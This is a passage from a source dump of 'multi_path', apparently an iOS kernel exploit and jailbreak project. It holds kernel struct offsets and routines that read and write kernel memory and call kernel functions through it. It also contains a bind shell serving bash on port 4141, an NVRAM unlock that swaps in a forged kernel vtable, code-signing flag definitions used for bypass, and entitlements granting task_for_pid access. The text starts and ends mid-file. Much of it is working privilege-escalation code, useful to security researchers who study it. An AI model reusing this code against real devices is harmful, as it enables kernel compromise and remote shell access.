42 | unsigned offsetof_csb_platform_binary = 0xA4; // cs_blob::csb_platform_binary
43 | unsigned offsetof_csb_platform_path = 0xA8; // cs_blob::csb_platform_path
44 |
45 | unsigned offsetof_t_flags = 0x3a0; // task::t_flags
46 |
47 | unsigned offsetof_v_mount = 0xd8; // vnode::v_mount
48 | unsigned offsetof_v_specinfo = 0x78; // vnode::v_specinfo
49 | unsigned offsetof_specflags = 0x10;
50 | unsigned offsetof_mnt_flag = 0x70; // mount::mnt_flag
51 | unsigned offsetof_mnt_data = 0x8f8; // mount::mnt_data
52 |
53 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/offsetof.h:
--------------------------------------------------------------------------------
1 |
2 | extern unsigned offsetof_p_pid;
3 | extern unsigned offsetof_task;
4 | extern unsigned offsetof_p_uid;
5 | extern unsigned offsetof_p_gid;
6 | extern unsigned offsetof_p_ruid;
7 | extern unsigned offsetof_p_rgid;
8 | extern unsigned offsetof_p_ucred;
9 | extern unsigned offsetof_p_csflags;
10 | extern unsigned offsetof_itk_self;
11 | extern unsigned offsetof_itk_sself;
12 | extern unsigned offsetof_itk_bootstrap;
13 | extern unsigned offsetof_itk_space;
14 | extern unsigned offsetof_ip_mscount;
15 | extern unsigned offsetof_ip_srights;
16 | extern unsigned offsetof_ip_kobject;
17 | extern unsigned offsetof_p_textvp;
18 | extern unsigned offsetof_p_textoff;
19 | extern unsigned offsetof_p_cputype;
20 | extern unsigned offsetof_p_cpu_subtype;
21 | extern unsigned offsetof_special;
22 | extern unsigned offsetof_ipc_space_is_table;
23 |
24 | extern unsigned offsetof_ucred_cr_uid;
25 | extern unsigned offsetof_ucred_cr_ruid;
26 | extern unsigned offsetof_ucred_cr_gid;
27 | extern unsigned offsetof_ucred_cr_rgid;
28 | extern unsigned offsetof_ucred_cr_svgid;
29 | extern unsigned offsetof_ucred_cr_groups;
30 | extern unsigned offsetof_ucred_cr_ngroups;
31 | extern unsigned offsetof_ucred_cr_svuid;
32 |
33 | extern unsigned offsetof_v_type;
34 | extern unsigned offsetof_v_id;
35 | extern unsigned offsetof_v_ubcinfo;
36 |
37 | extern unsigned offsetof_ubcinfo_csblobs;
38 |
39 | extern unsigned offsetof_csb_cputype;
40 | extern unsigned offsetof_csb_flags;
41 | extern unsigned offsetof_csb_base_offset;
42 | extern unsigned offsetof_csb_entitlements_offset;
43 | extern unsigned offsetof_csb_signer_type;
44 | extern unsigned offsetof_csb_platform_binary;
45 | extern unsigned offsetof_csb_platform_path;
46 |
47 | extern unsigned offsetof_t_flags;
48 |
49 | extern unsigned offsetof_v_mount;
50 | extern unsigned offsetof_v_specinfo;
51 | extern unsigned offsetof_specflags;
52 | extern unsigned offsetof_mnt_flag;
53 | extern unsigned offsetof_mnt_data;
54 |
55 | #define CS_VALID 0x0000001 /* dynamically valid */
56 | #define CS_ADHOC 0x0000002 /* ad hoc signed */
57 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */
58 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */
59 |
60 | #define CS_HARD 0x0000100 /* don't load invalid pages */
61 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */
62 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */
63 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */
64 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */
65 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */
66 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000
67 |
68 | #define CS_ALLOWED_MACHO 0x00ffffe
69 |
70 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */
71 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */
72 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */
73 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */
74 |
75 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */
76 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */
77 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */
78 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */
79 |
80 | #define CS_DEBUGGED 0x10000000 /* process is currently or has previously been debugged and allowed to run with invalid pages */
81 | #define CS_SIGNED 0x20000000 /* process has a signature (may have gone invalid) */
82 | #define CS_DEV_CODE 0x40000000 /* code is dev signed, cannot be loaded into prod signed code (will go away with rdar://problem/28322552) */
83 |
84 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/osobject.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include "kexecute.h"
3 | #include "kmem.h"
4 | #include "kern_utils.h"
5 | #include "patchfinder64.h"
6 | #include "osobject.h"
7 |
8 | // offsets in vtable:
9 | static uint32_t off_OSDictionary_SetObjectWithCharP = sizeof(void*) * 0x1F;
10 | static uint32_t off_OSDictionary_GetObjectWithCharP = sizeof(void*) * 0x26;
11 | static uint32_t off_OSDictionary_Merge = sizeof(void*) * 0x23;
12 |
13 | static uint32_t off_OSArray_Merge = sizeof(void*) * 0x1E;
14 | static uint32_t off_OSArray_RemoveObject = sizeof(void*) * 0x20;
15 | static uint32_t off_OSArray_GetObject = sizeof(void*) * 0x22;
16 |
17 | static uint32_t off_OSObject_Release = sizeof(void*) * 0x05;
18 | static uint32_t off_OSObject_GetRetainCount = sizeof(void*) * 0x03;
19 | static uint32_t off_OSObject_Retain = sizeof(void*) * 0x04;
20 |
21 | static uint32_t off_OSString_GetLength = sizeof(void*) * 0x11;
22 |
23 | // 1 on success, 0 on error
24 | int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {
25 | size_t len = strlen(key) + 1;
26 |
27 | uint64_t ks = kalloc(len);
28 | kwrite(ks, key, len);
29 |
30 | uint64_t vtab = rk64(dict);
31 | uint64_t f = rk64(vtab + off_OSDictionary_SetObjectWithCharP);
32 |
33 | int rv = (int) kexecute(f, dict, ks, val, 0, 0, 0, 0);
34 |
35 | kfree(ks, len);
36 |
37 | return rv;
38 | }
39 |
40 | // XXX it can return 0 in lower 32 bits but still be valid
41 | // fix addr of returned value and check if rk64 gives ptr
42 | // to vtable addr saved before
43 |
44 | // address if exists, 0 if not
45 | uint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {
46 | size_t len = strlen(key) + 1;
47 |
48 | uint64_t ks = kalloc(len);
49 | kwrite(ks, key, len);
50 |
51 | uint64_t vtab = rk64(dict);
52 | uint64_t f = rk64(vtab + off_OSDictionary_GetObjectWithCharP);
53 |
54 | int rv = (int) kexecute(f, dict, ks, 0, 0, 0, 0, 0);
55 |
56 | kfree(ks, len);
57 |
58 | return rv;
59 | }
60 |
61 | uint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {
62 | uint64_t ret = _OSDictionary_GetItem(dict, key);
63 |
64 | if (ret != 0) {
65 | // XXX can it be not in zalloc?..
66 | ret = zm_fix_addr(ret);
67 | }
68 |
69 | return ret;
70 | }
71 |
72 | // 1 on success, 0 on error
73 | int OSDictionary_Merge(uint64_t dict, uint64_t aDict) {
74 | uint64_t vtab = rk64(dict);
75 | uint64_t f = rk64(vtab + off_OSDictionary_Merge);
76 |
77 | return (int) kexecute(f, dict, aDict, 0, 0, 0, 0, 0);
78 | }
79 |
80 | // 1 on success, 0 on error
81 | int OSArray_Merge(uint64_t array, uint64_t aArray) {
82 | uint64_t vtab = rk64(array);
83 | uint64_t f = rk64(vtab + off_OSArray_Merge);
84 |
85 | return (int) kexecute(f, array, aArray, 0, 0, 0, 0, 0);
86 | }
87 |
88 | uint64_t _OSArray_GetObject(uint64_t array, unsigned int idx){
89 | uint64_t vtab = rk64(array);
90 | uint64_t f = rk64(vtab + off_OSArray_GetObject);
91 |
92 | return kexecute(f, array, idx, 0, 0, 0, 0, 0);
93 | }
94 |
95 | uint64_t OSArray_GetObject(uint64_t array, unsigned int idx){
96 | uint64_t ret = _OSArray_GetObject(array, idx);
97 |
98 | if (ret != 0){
99 | // XXX can it be not in zalloc?..
100 | ret = zm_fix_addr(ret);
101 | }
102 | return ret;
103 | }
104 |
105 | void OSArray_RemoveObject(uint64_t array, unsigned int idx){
106 | uint64_t vtab = rk64(array);
107 | uint64_t f = rk64(vtab + off_OSArray_RemoveObject);
108 |
109 | (void)kexecute(f, array, idx, 0, 0, 0, 0, 0);
110 | }
111 |
112 | // XXX error handling just for fun? :)
113 | uint64_t _OSUnserializeXML(const char* buffer) {
114 | size_t len = strlen(buffer) + 1;
115 |
116 | uint64_t ks = kalloc(len);
117 | kwrite(ks, buffer, len);
118 |
119 | uint64_t errorptr = 0;
120 |
121 | uint64_t rv = kexecute(find_osunserializexml(), ks, errorptr, 0, 0, 0, 0, 0);
122 | kfree(ks, len);
123 |
124 | return rv;
125 | }
126 |
127 | uint64_t OSUnserializeXML(const char* buffer) {
128 | uint64_t ret = _OSUnserializeXML(buffer);
129 |
130 | if (ret != 0) {
131 | // XXX can it be not in zalloc?..
132 | ret = zm_fix_addr(ret);
133 | }
134 |
135 | return ret;
136 | }
137 |
138 | void OSObject_Release(uint64_t osobject) {
139 | uint64_t vtab = rk64(osobject);
140 | uint64_t f = rk64(vtab + off_OSObject_Release);
141 | (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
142 | }
143 |
144 | void OSObject_Retain(uint64_t osobject) {
145 | uint64_t vtab = rk64(osobject);
146 | uint64_t f = rk64(vtab + off_OSObject_Release);
147 | (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
148 | }
149 |
150 | uint32_t OSObject_GetRetainCount(uint64_t osobject) {
151 | uint64_t vtab = rk64(osobject);
152 | uint64_t f = rk64(vtab + off_OSObject_Release);
153 | return (uint32_t) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
154 | }
155 |
156 | unsigned int OSString_GetLength(uint64_t osstring){
157 | uint64_t vtab = rk64(osstring);
158 | uint64_t f = rk64(vtab + off_OSString_GetLength);
159 | return (unsigned int)kexecute(f, osstring, 0, 0, 0, 0, 0, 0);
160 | }
161 |
162 | char *OSString_CopyString(uint64_t osstring){
163 | unsigned int length = OSString_GetLength(osstring);
164 | char *str = malloc(length + 1);
165 | str[length] = 0;
166 |
167 | kread(OSString_CStringPtr(osstring), str, length);
168 | return str;
169 | }
170 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/osobject.h:
--------------------------------------------------------------------------------
1 | #define OSDictionary_ItemCount(dict) kread32(dict+20)
2 | #define OSDictionary_ItemBuffer(dict) kread64(dict+32)
3 | #define OSDictionary_ItemKey(buffer, idx) kread64(buffer+16*idx)
4 | #define OSDictionary_ItemValue(buffer, idx) kread64(buffer+16*idx+8)
5 | #define OSString_CStringPtr(str) kread64(str + 0x10)
6 | #define OSArray_ItemCount(arr) kread32(arr+0x14)
7 | #define OSArray_ItemBuffer(arr) kread64(arr+32)
8 |
9 | // see osobject.c for info
10 |
11 | int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val);
12 | uint64_t OSDictionary_GetItem(uint64_t dict, const char *key);
13 | int OSDictionary_Merge(uint64_t dict, uint64_t aDict);
14 | void OSArray_RemoveObject(uint64_t array, unsigned int idx);
15 | uint64_t OSArray_GetObject(uint64_t array, unsigned int idx);
16 | int OSArray_Merge(uint64_t array, uint64_t aArray);
17 | uint64_t OSUnserializeXML(const char* buffer);
18 |
19 | void OSObject_Release(uint64_t osobject);
20 | void OSObject_Retain(uint64_t osobject);
21 | uint32_t OSObject_GetRetainCount(uint64_t osobject);
22 |
23 | unsigned int OSString_GetLength(uint64_t osstring);
24 | char *OSString_CopyString(uint64_t osstring);
25 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/patchfinder64.h:
--------------------------------------------------------------------------------
1 | #ifndef PATCHFINDER64_H_
2 | #define PATCHFINDER64_H_
3 |
4 | int init_kernel(uint64_t base, const char *filename);
5 | void term_kernel(void);
6 |
7 | // Fun part
8 | uint64_t find_allproc(void);
9 | uint64_t find_add_x0_x0_0x40_ret(void);
10 | uint64_t find_copyout(void);
11 | uint64_t find_bzero(void);
12 | uint64_t find_bcopy(void);
13 | uint64_t find_rootvnode(void);
14 | uint64_t find_trustcache(void);
15 | uint64_t find_amficache(void);
16 | uint64_t find_OSBoolean_True(void);
17 | uint64_t find_OSBoolean_False(void);
18 | uint64_t find_zone_map_ref(void);
19 | uint64_t find_osunserializexml(void);
20 | uint64_t find_smalloc(void);
21 | #endif
22 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/qilin.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/jelbrek/qilin.o
--------------------------------------------------------------------------------
/multi_path/jelbrek/remap_tfp_set_hsp.h:
--------------------------------------------------------------------------------
1 | //
2 | // remap_tfp_set_hsp.h
3 | // electra
4 | //
5 | // Created by Viktor Oreshkin on 16.01.18.
6 | // Copyright © 2018 Electra Team. All rights reserved.
7 | //
8 |
9 | #ifndef remap_tfp_set_hsp_h
10 | #define remap_tfp_set_hsp_h
11 |
12 | #include
13 |
14 | int remap_tfp0_set_hsp4(mach_port_t *port);
15 |
16 | #endif /* remap_tfp_set_hsp_h */
17 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/shell.c:
--------------------------------------------------------------------------------
1 |
2 | /* J. Levin has compiled a bunch of Apple opensource utilites for arm64
3 | * You can get them from his site here: http://newosxbook.com/tools/iOSBinaries.html
4 | *
5 | * Follow the link to "The 64-bit tgz pack"
6 | *
7 | * Unpack the tarball into a directory called iosbinpack64 and drag-and-drop
8 | * that directory into the directory with all the source files in in XCode
9 | * so that it ends up in the .app bundle
10 | */
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 |
17 | #include
18 |
19 | #include
20 | #include
21 | #include
22 |
23 | #include
24 | #include
25 | #include
26 |
27 | #include
28 |
29 | char* bundle_path() {
30 | CFBundleRef mainBundle = CFBundleGetMainBundle();
31 | CFURLRef resourcesURL = CFBundleCopyResourcesDirectoryURL(mainBundle);
32 | int len = 4096;
33 | char* path = malloc(len);
34 |
35 | CFURLGetFileSystemRepresentation(resourcesURL, TRUE, (UInt8*)path, len);
36 |
37 | return path;
38 | }
39 |
40 | char* prepare_directory(char* dir_path) {
41 | DIR *dp;
42 | struct dirent *ep;
43 |
44 | char* in_path = NULL;
45 | char* bundle_root = bundle_path();
46 | asprintf(&in_path, "%s/iosbinpack64/%s", bundle_root, dir_path);
47 |
48 |
49 | dp = opendir(in_path);
50 | if (dp == NULL) {
51 | printf("unable to open payload directory: %s\n", in_path);
52 | return NULL;
53 | }
54 |
55 | while ((ep = readdir(dp))) {
56 | char* entry = ep->d_name;
57 | char* full_entry_path = NULL;
58 | asprintf(&full_entry_path, "%s/iosbinpack64/%s/%s", bundle_root, dir_path, entry);
59 |
60 | printf("preparing: %s\n", full_entry_path);
61 |
62 | // make that executable:
63 | int chmod_err = chmod(full_entry_path, 0777);
64 | if (chmod_err != 0){
65 | printf("chmod failed\n");
66 | }
67 |
68 | free(full_entry_path);
69 | }
70 |
71 | closedir(dp);
72 | free(bundle_root);
73 |
74 | return in_path;
75 | }
76 |
77 | // prepare all the payload binaries under the iosbinpack64 directory
78 | // and build up the PATH
79 | char* prepare_payload() {
80 | char* path = calloc(4096, 1);
81 | strcpy(path, "PATH=");
82 | char* dir;
83 | dir = prepare_directory("bin");
84 | strcat(path, dir);
85 | strcat(path, ":");
86 | free(dir);
87 |
88 | dir = prepare_directory("sbin");
89 | strcat(path, dir);
90 | strcat(path, ":");
91 | free(dir);
92 |
93 | dir = prepare_directory("usr/bin");
94 | strcat(path, dir);
95 | strcat(path, ":");
96 | free(dir);
97 |
98 | dir = prepare_directory("usr/local/bin");
99 | strcat(path, dir);
100 | strcat(path, ":");
101 | free(dir);
102 |
103 | dir = prepare_directory("usr/sbin");
104 | strcat(path, dir);
105 | strcat(path, ":");
106 | free(dir);
107 |
108 | strcat(path, "/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec");
109 |
110 | return path;
111 | }
112 |
113 | void do_bind_shell(char* env, int port) {
114 | char* bundle_root = bundle_path();
115 |
116 | char* shell_path = NULL;
117 | asprintf(&shell_path, "%s/iosbinpack64/bin/bash", bundle_root);
118 |
119 | char* argv[] = {shell_path, NULL};
120 | char* envp[] = {env, NULL};
121 |
122 | struct sockaddr_in sa;
123 | sa.sin_len = 0;
124 | sa.sin_family = AF_INET;
125 | sa.sin_port = htons(port);
126 | sa.sin_addr.s_addr = INADDR_ANY;
127 |
128 | int sock = socket(PF_INET, SOCK_STREAM, 0);
129 | bind(sock, (struct sockaddr*)&sa, sizeof(sa));
130 | listen(sock, 1);
131 |
132 | printf("shell listening on port %d\n", port);
133 |
134 | for(;;) {
135 | int conn = accept(sock, 0, 0);
136 |
137 | posix_spawn_file_actions_t actions;
138 |
139 | posix_spawn_file_actions_init(&actions);
140 | posix_spawn_file_actions_adddup2(&actions, conn, 0);
141 | posix_spawn_file_actions_adddup2(&actions, conn, 1);
142 | posix_spawn_file_actions_adddup2(&actions, conn, 2);
143 |
144 |
145 | pid_t spawned_pid = 0;
146 | int spawn_err = posix_spawn(&spawned_pid, shell_path, &actions, NULL, argv, envp);
147 |
148 | if (spawn_err != 0){
149 | perror("shell spawn error");
150 | } else {
151 | printf("shell posix_spawn success!\n");
152 | }
153 |
154 | posix_spawn_file_actions_destroy(&actions);
155 |
156 | printf("our pid: %d\n", getpid());
157 | printf("spawned_pid: %d\n", spawned_pid);
158 |
159 | int wl = 0;
160 | while (waitpid(spawned_pid, &wl, 0) == -1 && errno == EINTR);
161 | }
162 | }
163 |
164 | void drop_payload() {
165 | char* env_path = prepare_payload();
166 | printf("will launch a shell with this environment: %s\n", env_path);
167 |
168 | do_bind_shell(env_path, 4141);
169 | free(env_path);
170 | }
171 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/shell.h:
--------------------------------------------------------------------------------
1 | #ifndef drop_payload_h
2 | #define drop_payload_h
3 |
4 | void drop_payload();
5 | char* prepare_payload();
6 | char* bundle_path();
7 |
8 | #endif
9 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/unlocknvram.c:
--------------------------------------------------------------------------------
1 | // iOS 11 moves OFVariables to const
2 | // https://twitter.com/s1guza/status/908790514178301952
3 | // however, if we:
4 | // 1) Can find IODTNVRAM service
5 | // 2) Have tfp0 / kernel read|write|alloc
6 | // 3) Can leak kernel address of mach port
7 | // then we can fake vtable on IODTNVRAM object
8 | // async_wake satisfies those requirements
9 | // however, I wasn't able to actually set or get ANY nvram variable
10 | // not even userread/userwrite
11 | // Guess sandboxing won't let to access nvram
12 |
13 | #include
14 | #include
15 | #include "kern_utils.h"
16 | #include "offsetof.h"
17 | #include "../offsets.h"
18 |
19 | // convertPropToObject calls getOFVariableType
20 | // open convertPropToObject, look for first vtable call -- that'd be getOFVariableType
21 | // find xrefs, figure out vtable start from that
22 | // following are offsets of entries in vtable
23 |
24 | // it always returns false
25 | const uint64_t searchNVRAMProperty = 0x590;
26 | // 0 corresponds to root only
27 | const uint64_t getOFVariablePerm = 0x558;
28 |
29 | typedef mach_port_t io_service_t;
30 | typedef mach_port_t io_connect_t;
31 | extern const mach_port_t kIOMasterPortDefault;
32 | CFMutableDictionaryRef IOServiceMatching(const char *name) CF_RETURNS_RETAINED;
33 | io_service_t IOServiceGetMatchingService(mach_port_t masterPort, CFDictionaryRef matching CF_RELEASES_ARGUMENT);
34 |
35 |
36 | // get kernel address of IODTNVRAM object
37 | uint64_t get_iodtnvram_obj(void) {
38 | // get user serv
39 | io_service_t IODTNVRAMSrv = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IODTNVRAM"));
40 |
41 | // leak user serv
42 | uint64_t nvram_up = find_port_address(IODTNVRAMSrv);
43 | // get kern obj -- IODTNVRAM*
44 | uint64_t IODTNVRAMObj = kread64(nvram_up + offsetof_ip_kobject);
45 |
46 | return IODTNVRAMObj;
47 | }
48 |
49 | void unlocknvram(void) {
50 | const uint64_t searchNVRAMProperty = 0x590;
51 | // 0 corresponds to root only
52 | const uint64_t getOFVariablePerm = 0x558;
53 | // get user serv
54 | io_service_t IODTNVRAMSrv = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IODTNVRAM"));
55 |
56 | // leak user serv
57 | // it should use via_kmem_read method by now, so second param doesn't matter
58 | uint64_t nvram_up = find_port_address(IODTNVRAMSrv);
59 | // get kern obj -- IODTNVRAM*
60 | uint64_t IODTNVRAMObj = kread64(nvram_up + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
61 | uint64_t vtable_start = kread64(IODTNVRAMObj);
62 | uint64_t vtable_end = vtable_start;
63 | // Is vtable really guaranteed to end with 0 or was it just a coincidence?..
64 | // should we just use some max value instead?
65 | while (kread64(vtable_end) != 0) vtable_end += sizeof(uint64_t);
66 |
67 | uint32_t vtable_len = (uint32_t) (vtable_end - vtable_start);
68 |
69 | // copy vtable to userspace
70 | uint64_t *buf = calloc(1, vtable_len);
71 | kread(vtable_start, buf, vtable_len);
72 |
73 | // alter it
74 | buf[getOFVariablePerm/sizeof(uint64_t)] = buf[searchNVRAMProperty/sizeof(uint64_t)];
75 |
76 | // allocate buffer in kernel and copy it back
77 | uint64_t fake_vtable = kmem_alloc_wired(vtable_len);
78 | kwrite(fake_vtable, buf, vtable_len);
79 |
80 | // replace vtable on IODTNVRAM object
81 | kwrite64(IODTNVRAMObj, fake_vtable);
82 |
83 | free(buf);
84 | }
85 |
--------------------------------------------------------------------------------
/multi_path/jelbrek/unlocknvram.h:
--------------------------------------------------------------------------------
1 | void unlocknvram(void);
2 |
--------------------------------------------------------------------------------
/multi_path/kmem.h:
--------------------------------------------------------------------------------
1 | #ifndef kmem_h
2 | #define kmem_h
3 |
4 | extern mach_port_t tfp0;
5 |
6 | uint32_t rk32(uint64_t kaddr);
7 | uint64_t rk64(uint64_t kaddr);
8 |
9 | void wk32(uint64_t kaddr, uint32_t val);
10 | void wk64(uint64_t kaddr, uint64_t val);
11 |
12 | #endif
13 |
--------------------------------------------------------------------------------
/multi_path/launchctl/Ent.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | platform-application
6 |
7 | get-task-allow
8 |
9 | com.apple.system-task-ports
10 |
11 | task_for_pid-allow
12 |
13 | com.apple.private.security.container-required
14 |
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/multi_path/launchctl/Makefile:
--------------------------------------------------------------------------------
1 | TARGET = launchctl
2 | OUTDIR ?= bin
3 |
4 | CC = xcrun -sdk iphoneos cc -arch arm64
5 | # it is injected into trust cache by code
6 | # which only supports sha-256 signatures
7 | LDID = ldid2
8 | CFLAGS = -Wall -Iinclude
9 |
10 | .PHONY: all clean
11 |
12 | DEBUG ?= 0
13 | ifeq ($(DEBUG), 1)
14 | CFLAGS += -DINJECT_CRITICALD_DEBUG
15 | else
16 | CFLAGS += -O2
17 | endif
18 |
19 | all: $(OUTDIR)/$(TARGET)
20 |
21 | $(OUTDIR):
22 | mkdir -p $(OUTDIR)
23 |
24 | $(OUTDIR)/$(TARGET): *.m | $(OUTDIR)
25 | $(CC) -o $@ $^ -framework Foundation -framework IOKit $(CFLAGS) AppSupport.tbd
26 | $(LDID) -SEnt.plist $@
27 |
28 | clean:
29 | rm -f $(OUTDIR)/$(TARGET)
30 |
--------------------------------------------------------------------------------
/multi_path/launchctl/include/AppSupport/CPBitmapStore.h:
--------------------------------------------------------------------------------
1 | @interface CPBitmapStore : NSObject
2 |
3 | - (void)purge;
4 |
5 | @end
6 |
--------------------------------------------------------------------------------
/multi_path/launchctl/include/AppSupport/CPDistributedMessagingCenter.h:
--------------------------------------------------------------------------------
1 | @interface CPDistributedMessagingCenter : NSObject
2 |
3 | + (instancetype)centerNamed:(NSString *)name;
4 |
5 | - (void)runServer;
6 | - (void)runServerOnCurrentThread;
7 | - (void)stopServer;
8 |
9 | - (void)registerForMessageName:(NSString *)messageName target:(id)target selector:(SEL)selector;
10 |
11 | - (BOOL)sendMessageName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;
12 |
13 | - (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;
14 | - (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo error:(NSError **)error;
15 |
16 | @end
17 |
--------------------------------------------------------------------------------
/multi_path/launchctl/main.m:
--------------------------------------------------------------------------------
1 | #import
2 | #include
3 | #include
4 |
5 | int main(int argc, const char* argv[], const char* envp[]) {
6 |
7 | CPDistributedMessagingCenter *messageCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.jbclient"];
8 |
9 | pid_t pd;
10 | posix_spawnattr_t attr;
11 | posix_spawnattr_init(&attr);
12 | posix_spawnattr_setflags(&attr, POSIX_SPAWN_START_SUSPENDED); //this flag will make the created process stay frozen until we send the CONT signal. This so we can platformize it before it launches.
13 |
14 | NSString *reallaunchctl = [NSString stringWithFormat:@"%@/launchctl_", [[NSBundle mainBundle] bundlePath]];
15 |
16 | int rv = posix_spawn(&pd, [reallaunchctl UTF8String], NULL, &attr, argv, envp);
17 |
18 | [messageCenter sendMessageAndReceiveReplyName:@"platformize" userInfo:[NSDictionary dictionaryWithObject:[NSString stringWithFormat:@"%d", pd] forKey:@"pid"]];
19 |
20 | kill(pd, SIGCONT); //continue
21 |
22 | int a;
23 | waitpid(pd, &a, 0);
24 |
25 | return rv;
26 | }
27 |
--------------------------------------------------------------------------------
/multi_path/main.m:
--------------------------------------------------------------------------------
1 | //
2 | // main.m
3 | // multi_path
4 | //
5 | // Created by Ian Beer on 5/28/18.
6 | // Copyright © 2018 Ian Beer. All rights reserved.
7 | //
8 |
9 | #import
10 | #import "AppDelegate.h"
11 |
12 | int main(int argc, char * argv[]) {
13 | @autoreleasepool {
14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/multi_path/multi_path.entitlements:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | com.apple.developer.networking.multipath
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/multi_path/offsets.h:
--------------------------------------------------------------------------------
1 | #ifndef offsets_h
2 | #define offsets_h
3 |
4 | enum kstruct_offset {
5 | /* struct task */
6 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
7 | KSTRUCT_OFFSET_TASK_REF_COUNT,
8 | KSTRUCT_OFFSET_TASK_ACTIVE,
9 | KSTRUCT_OFFSET_TASK_VM_MAP,
10 | KSTRUCT_OFFSET_TASK_NEXT,
11 | KSTRUCT_OFFSET_TASK_PREV,
12 | KSTRUCT_OFFSET_TASK_ITK_SPACE,
13 | KSTRUCT_OFFSET_TASK_BSD_INFO,
14 |
15 | /* struct ipc_port */
16 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
17 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
18 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
19 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
20 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
21 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
22 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
23 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
24 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
25 |
26 | /* struct proc */
27 | KSTRUCT_OFFSET_PROC_PID,
28 | KSTRUCT_OFFSET_PROC_P_FD,
29 |
30 | /* struct filedesc */
31 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
32 |
33 | /* struct fileproc */
34 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB,
35 |
36 | /* struct fileglob */
37 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA,
38 |
39 | /* struct socket */
40 | KSTRUCT_OFFSET_SOCKET_SO_PCB,
41 |
42 | /* struct pipe */
43 | KSTRUCT_OFFSET_PIPE_BUFFER,
44 |
45 | /* struct ipc_space */
46 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
47 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,
48 |
49 | KFREE_ADDR_OFFSET,
50 | };
51 |
52 | int koffset(enum kstruct_offset offset);
53 | void offsets_init(void);
54 |
55 | #endif
56 |
--------------------------------------------------------------------------------
/multi_path/offsets.m:
--------------------------------------------------------------------------------
1 | #import
2 |
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | #include "offsets.h"
10 |
11 | int* offsets = NULL;
12 |
13 | int kstruct_offsets_11_0[] = {
14 | 0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
15 | 0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
16 | 0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
17 | 0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
18 | 0x28, // KSTRUCT_OFFSET_TASK_NEXT,
19 | 0x30, // KSTRUCT_OFFSET_TASK_PREV,
20 | 0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
21 | 0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
22 |
23 | 0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
24 | 0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
25 | 0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
